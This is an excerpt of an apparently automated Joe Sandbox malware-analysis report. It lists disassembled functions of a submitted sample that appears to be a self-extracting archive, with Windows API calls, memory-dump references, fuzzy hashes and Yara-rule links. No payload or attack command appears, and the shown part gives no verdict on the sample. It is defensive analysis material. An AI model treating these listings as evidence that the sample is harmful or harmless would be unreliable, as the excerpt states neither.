                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: EnvironmentVariable
                • String ID: sfxcmd$sfxpar
                • API String ID: 1431749950-3493335439
                • Opcode ID: 2aef212e754318d5e9b38c4543d8bf88e4ec224d9b42f828648b827fa7a89f97
                • Instruction ID: 1f6420f2c7a1762f6da58e2f00c0b9d9aca88cdc0ee41b673e464b87232fcf18
                • Opcode Fuzzy Hash: 2aef212e754318d5e9b38c4543d8bf88e4ec224d9b42f828648b827fa7a89f97
                • Instruction Fuzzy Hash: FFF02771800228E2D7202F928C19ABF7B5CBF18B42B000097FD8552241D628CC40DAF9
                Function 004D984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1024 4d984e-4d985a 1025 4d985c-4d9864 GetStdHandle 1024->1025 1026 4d9867-4d987e ReadFile 1024->1026 1025->1026 1027 4d98da 1026->1027 1028 4d9880-4d9889 call 4d9989 1026->1028 1029 4d98dd-4d98e2 1027->1029 1032 4d988b-4d9893 1028->1032 1033 4d98a2-4d98a6 1028->1033 1032->1033 1036 4d9895 1032->1036 1034 4d98a8-4d98b1 GetLastError 1033->1034 1035 4d98b7-4d98bb 1033->1035 1034->1035 1038 4d98b3-4d98b5 1034->1038 1039 4d98bd-4d98c5 1035->1039 1040 4d98d5-4d98d8 1035->1040 1037 4d9896-4d98a0 call 4d984e 1036->1037 1037->1029 1038->1029 1039->1040 1042 4d98c7-4d98d0 GetLastError 1039->1042 1040->1029 1042->1040 1044 4d98d2-4d98d3 1042->1044 1044->1037
                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 004D985E
                • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 004D9876
                • GetLastError.KERNEL32 ref: 004D98A8
                • GetLastError.KERNEL32 ref: 004D98C7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ErrorLast$FileHandleRead
                • String ID:
                • API String ID: 2244327787-0
                • Opcode ID: 177d4d1503f9d3bf78008d96e36694c35a6ba3002c10bc05767852318d4dbb0b
                • Instruction ID: cfc5fe5e6cafe386a898bb0f2fd1cee44395e50ebd6c72a064f9e3948790ec03
                • Opcode Fuzzy Hash: 177d4d1503f9d3bf78008d96e36694c35a6ba3002c10bc05767852318d4dbb0b
                • Instruction Fuzzy Hash: 6411A330920204EFDB206B51C824A6A77ACEB12B30F14852BF82AC6780D7799D44BF5A
                Function 004FA4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,004F3713,00000000,00000000,?,004FA49B,004F3713,00000000,00000000,00000000,?,004FA698,00000006,FlsSetValue), ref: 004FA526
                • GetLastError.KERNEL32(?,004FA49B,004F3713,00000000,00000000,00000000,?,004FA698,00000006,FlsSetValue,00507348,00507350,00000000,00000364,?,004F9077), ref: 004FA532
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004FA49B,004F3713,00000000,00000000,00000000,?,004FA698,00000006,FlsSetValue,00507348,00507350,00000000), ref: 004FA540
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: 068442c59e93b18755235849295530e7474b3707e65eedc4baeee4e830e679e4
                • Instruction ID: db09af8e9e44423a873e4cb35b9b49d7cc4b851721f6b13a672033bdd0e338f7
                • Opcode Fuzzy Hash: 068442c59e93b18755235849295530e7474b3707e65eedc4baeee4e830e679e4
                • Instruction Fuzzy Hash: C0014C7261122ABBC7208B689C44A7B775CAF157A17140122FA0ED3340D724D914C6E5
                Function 004FB188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004F8FA5: GetLastError.KERNEL32(?,00510EE8,004F3E14,00510EE8,?,?,004F3713,00000050,?,00510EE8,00000200), ref: 004F8FA9
                  • Part of subcall function 004F8FA5: _free.LIBCMT ref: 004F8FDC
                  • Part of subcall function 004F8FA5: SetLastError.KERNEL32(00000000,?,00510EE8,00000200), ref: 004F901D
                  • Part of subcall function 004F8FA5: _abort.LIBCMT ref: 004F9023
                  • Part of subcall function 004FB2AE: _abort.LIBCMT ref: 004FB2E0
                  • Part of subcall function 004FB2AE: _free.LIBCMT ref: 004FB314
                  • Part of subcall function 004FAF1B: GetOEMCP.KERNEL32(00000000,?,?,004FB1A5,?), ref: 004FAF46
                • _free.LIBCMT ref: 004FB200
                • _free.LIBCMT ref: 004FB236
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: _free$ErrorLast_abort
                • String ID: P
                • API String ID: 2991157371-2113778011
                • Opcode ID: 22f03601f5a07063a8c3224183dfd34de5c294aa60315832560ba2ed265a5b82
                • Instruction ID: b51014ef54c1a0bb09e16704546399973203ffc341d5c3ee54498d06b8d6a3ca
                • Opcode Fuzzy Hash: 22f03601f5a07063a8c3224183dfd34de5c294aa60315832560ba2ed265a5b82
                • Instruction Fuzzy Hash: 8131043190020CAFDB10EFAAC945A7E77E5EF02324F25409FEA149B391EB795D41CB99
                Function 004D9F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                Download Yara Rule
                APIs
                • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,004DCC94,00000001,?,?,?,00000000,004E4ECD,?,?,?), ref: 004D9F4C
                • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,004E4ECD,?,?,?,?,?,004E4972,?), ref: 004D9F8E
                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,004DCC94,00000001,?,?), ref: 004D9FB8
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: FileWrite$Handle
                • String ID:
                • API String ID: 4209713984-0
                • Opcode ID: b7f22b2dd6d9ab034c5b2b8f3e999f17b9be60c213513f474a30ffe0895be8a8
                • Instruction ID: 48d200befe058d7d82262bf155faa54736c6b922600a89ffc735e215da9081a4
                • Opcode Fuzzy Hash: b7f22b2dd6d9ab034c5b2b8f3e999f17b9be60c213513f474a30ffe0895be8a8
                • Instruction Fuzzy Hash: 813122712083059BDF109F24D968B6BBBA8EB91710F04461FF945DB381C778DC49CBAA
                Function 004DA207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                Download Yara Rule
                APIs
                • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,004DA113,?,00000001,00000000,?,?), ref: 004DA22E
                • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,004DA113,?,00000001,00000000,?,?), ref: 004DA261
                • GetLastError.KERNEL32(?,?,?,?,004DA113,?,00000001,00000000,?,?), ref: 004DA27E
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CreateDirectory$ErrorLast
                • String ID:
                • API String ID: 2485089472-0
                • Opcode ID: 249b123380ea3ffe273ccd819fa0eeede973d8b384624b4cf444cfe59972530d
                • Instruction ID: 2dc599cea2da9b65605a480184a30cdb0012e9fc47582ffb000afd1ce34b91ca
                • Opcode Fuzzy Hash: 249b123380ea3ffe273ccd819fa0eeede973d8b384624b4cf444cfe59972530d
                • Instruction Fuzzy Hash: FA01C031181214A6DB22ABA75C29BEF334CAF07741F08049BF800D5351DB6ECA6186AF
                Function 004FAFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                Download Yara Rule
                APIs
                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 004FB019
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Info
                • String ID:
                • API String ID: 1807457897-3916222277
                • Opcode ID: 9ab46ad1f82b1e900850ae4635b2d2b470dc4e371fa40eac80f8c2ee03274e6d
                • Instruction ID: eb7619f2bb6d45c1f82b68eaba85b082ddbc958c012d79d57e3551f24ae4efdb
                • Opcode Fuzzy Hash: 9ab46ad1f82b1e900850ae4635b2d2b470dc4e371fa40eac80f8c2ee03274e6d
                • Instruction Fuzzy Hash: CC41387050434C9EDF218E24CD94AF7BBADDB06304F2404EEE69A87242D3399E46CFA4
                Function 004FA72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 004FA79D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: String
                • String ID: LCMapStringEx
                • API String ID: 2568140703-3893581201
                • Opcode ID: 65972aec9095c75d0690cfe3ae1a5ad844eb4ccbc55de7d400e298eb9e6be471
                • Instruction ID: 6412628d6d1340e0e97b26ee58dd15eaa9c918556138cef222d47ba6f70193f7
                • Opcode Fuzzy Hash: 65972aec9095c75d0690cfe3ae1a5ad844eb4ccbc55de7d400e298eb9e6be471
                • Instruction Fuzzy Hash: 6C01027250020DBBCF126FA1DD02DEE3FA6EB18750F044555FE1826160CA369931EB96
                Function 004FA6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                Download Yara Rule
                APIs
                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,004F9D2F), ref: 004FA715
                Strings
                • InitializeCriticalSectionEx, xrefs: 004FA6E5
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CountCriticalInitializeSectionSpin
                • String ID: InitializeCriticalSectionEx
                • API String ID: 2593887523-3084827643
                • Opcode ID: 35c39edfdc69cfe0e773464c78f9f4536e9cdee5c2fb0939c65099a143acc14c
                • Instruction ID: 89c98401da7ec2ea40c3fc10bca870f7fcfd22294e9dc60c0efda6ebc6314021
                • Opcode Fuzzy Hash: 35c39edfdc69cfe0e773464c78f9f4536e9cdee5c2fb0939c65099a143acc14c
                • Instruction Fuzzy Hash: 3DF0E971A4521CBBCB116F51DC05CAE7FA5FF18720B008455FD0916260DB729E20FB95
                Function 004FA56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Alloc
                • String ID: FlsAlloc
                • API String ID: 2773662609-671089009
                • Opcode ID: e94cd7ec4ece65866ed635a2685b571195119138143fa8e2aa052309e4932db2
                • Instruction ID: 9819cc6049843fb6983d3bd0d4a56db7caedd11b058e9f8808a50cb2db6da3be
                • Opcode Fuzzy Hash: e94cd7ec4ece65866ed635a2685b571195119138143fa8e2aa052309e4932db2
                • Instruction Fuzzy Hash: 23E0ABB0B4522CBFD3246B659C02CBEBF54EF29710B00011AFC0817280DE751E10E6DA
                Function 004F329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                Download Yara Rule
                APIs
                • try_get_function.LIBVCRUNTIME ref: 004F32AF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: try_get_function
                • String ID: FlsAlloc
                • API String ID: 2742660187-671089009
                • Opcode ID: 89988395038a2b93396e6c6996b9e679438d25219dcec2af2ba62dc5349e927e
                • Instruction ID: 0c2e99a3047ddd245806daf7dadcc82edabe4e0ddbe3322cbe887563659dc219
                • Opcode Fuzzy Hash: 89988395038a2b93396e6c6996b9e679438d25219dcec2af2ba62dc5349e927e
                • Instruction Fuzzy Hash: 65D02B31780A396AC51036C66C039BF7E449701FF7F450253FF081A2C2A466490085DD
                Function 004EE1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 004EE20B
                  • Part of subcall function 004EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004EDFD6
                  • Part of subcall function 004EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004EDFE7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: 3vo
                • API String ID: 1269201914-2837116934
                • Opcode ID: d0630757801e1881844bf0e1e03785f44b81a06519053728583a7da267a4dab6
                • Instruction ID: 1a3c8ae6ff28f5c66d689c196262244453a1766f04529078c3ced5be3202c11c
                • Opcode Fuzzy Hash: d0630757801e1881844bf0e1e03785f44b81a06519053728583a7da267a4dab6
                • Instruction Fuzzy Hash: 4AB012E1A6E0417C320C9143BD0AC3A071CD7C0B52B30C01FB305D40C095849C0A403B
                Function 004FB350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004FAF1B: GetOEMCP.KERNEL32(00000000,?,?,004FB1A5,?), ref: 004FAF46
                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,004FB1EA,?,00000000), ref: 004FB3C4
                • GetCPInfo.KERNEL32(00000000,004FB1EA,?,?,?,004FB1EA,?,00000000), ref: 004FB3D7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CodeInfoPageValid
                • String ID:
                • API String ID: 546120528-0
                • Opcode ID: c4946babde3ebda1a15ac2f6d2f9e70f6d08a266036112ba728cd893dfc95f96
                • Instruction ID: c8501d85ef71bc49412ddb61f22524df261be61a3c835daf360e6341c6020700
                • Opcode Fuzzy Hash: c4946babde3ebda1a15ac2f6d2f9e70f6d08a266036112ba728cd893dfc95f96
                • Instruction Fuzzy Hash: 1A5159B09002099EDB24DF32C8816BBBBE5EF42314F18846FD6868B253D73D9546CBD9
                Function 004D1385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 004D1385
                  • Part of subcall function 004D6057: __EH_prolog.LIBCMT ref: 004D605C
                  • Part of subcall function 004DC827: __EH_prolog.LIBCMT ref: 004DC82C
                  • Part of subcall function 004DC827: new.LIBCMT ref: 004DC86F
                  • Part of subcall function 004DC827: new.LIBCMT ref: 004DC893
                • new.LIBCMT ref: 004D13FE
                  • Part of subcall function 004DB07D: __EH_prolog.LIBCMT ref: 004DB082
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 547d2e3847122d47e9d04b2db0e0debad0203edd2a611b78b39f56ecc1351333
                • Instruction ID: 10f172b06834063537014ef9ce173806b92cfc9fcbe26723c1fa7bf61f02d49d
                • Opcode Fuzzy Hash: 547d2e3847122d47e9d04b2db0e0debad0203edd2a611b78b39f56ecc1351333
                • Instruction Fuzzy Hash: 424124B0805B409EE724DF7A84959E7FAE5FB18304F404A2FD6EE83282CB366554CB19
                Function 004D1380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 004D1385
                  • Part of subcall function 004D6057: __EH_prolog.LIBCMT ref: 004D605C
                  • Part of subcall function 004DC827: __EH_prolog.LIBCMT ref: 004DC82C
                  • Part of subcall function 004DC827: new.LIBCMT ref: 004DC86F
                  • Part of subcall function 004DC827: new.LIBCMT ref: 004DC893
                • new.LIBCMT ref: 004D13FE
                  • Part of subcall function 004DB07D: __EH_prolog.LIBCMT ref: 004DB082
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: f78f03c7122cbf7d73e9ea5ede19f7ad511158df58e6aaccfc0ecca101b68987
                • Instruction ID: 991ee59132904066112b2a62527935c11357fa69a9853a35884bee3f060724cf
                • Opcode Fuzzy Hash: f78f03c7122cbf7d73e9ea5ede19f7ad511158df58e6aaccfc0ecca101b68987
                • Instruction Fuzzy Hash: 8B4123B0805B409EE724DF7A84959E7FAE5FB18304F404A2FD6EE83282CB366554CB19
                Function 004D971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,004D9EDC,?,?,004D7867), ref: 004D97A6
                • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,004D9EDC,?,?,004D7867), ref: 004D97DB
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
